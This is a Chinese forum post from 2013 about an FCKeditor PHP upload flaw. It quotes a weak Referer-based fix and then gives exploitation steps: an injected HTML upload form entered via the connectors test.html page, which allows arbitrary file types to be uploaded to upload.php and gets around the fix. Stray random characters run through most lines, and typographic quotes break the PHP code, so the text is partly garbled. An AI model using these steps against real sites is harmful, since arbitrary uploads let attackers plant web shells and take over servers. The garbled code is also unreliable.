漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php* X& B0 b* x+ E
网上给出的修复方案是' v6 I0 l( G9 C9 c+ O
修复方法,删除FCK编辑器用其他的编辑器8 `0 L' t, o+ r" {
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
: q4 @7 z7 I, ]2 r6 e在
, D/ M' T. Y4 G3 `: @) m. @require(‘config.php’);$ `2 ~6 b8 U( G6 J1 A" m
require(‘util.php’);4 \* i6 ~& X* C- y; h8 r; d
的下面添加以下代码—————————–3 C, S8 r8 ^/ ~& t) D W
//防止外部提交
4 m+ U( B- G! U7 P# Dfunction outsidepost()7 g+ z( _8 |# q- y s0 i
{
) |% \ d* v) {$servername=$_SERVER['SERVER_NAME'];
9 M' _+ }) m. \/ m1 v: C$sub_from=@$_SERVER['HTTP_REFERER'];+ K" } U! M( O, p$ a4 a
$sub_len=strlen($servername);
) h- i+ G% k0 T5 C {' c$checkfrom=substr($sub_from,7,$sub_len);- m2 p5 V" v# k
if($checkfrom!=$servername){& r4 }4 }1 v( n
echo(“you don’t outsidepost!”);2 p( ~% }5 @& L( d/ I+ m6 [# w
exit;
* \8 S: r: ^0 F9 Z& s$ O}- H# F6 Q; t1 C, t ]
}
; _. l- H+ T3 ]5 K% g4 S3 T( ^ P% Xoutsidepost(); j1 U- v1 s1 l/ a3 Y
防止外部提交,但是没有防止内部提交,
* M# B) S" ^6 I0 {1 }8 @. H. Z利用方法:
+ O- T1 V% Z: `# a' |1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html) C' r/ i, _3 N+ b) r
2,在Current Folder 框输入- B5 p9 C, `$ @& L# G N
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>3 k! |$ M; q5 w% R2 j/ e
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。; Z/ v( H' q2 I# D Q
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对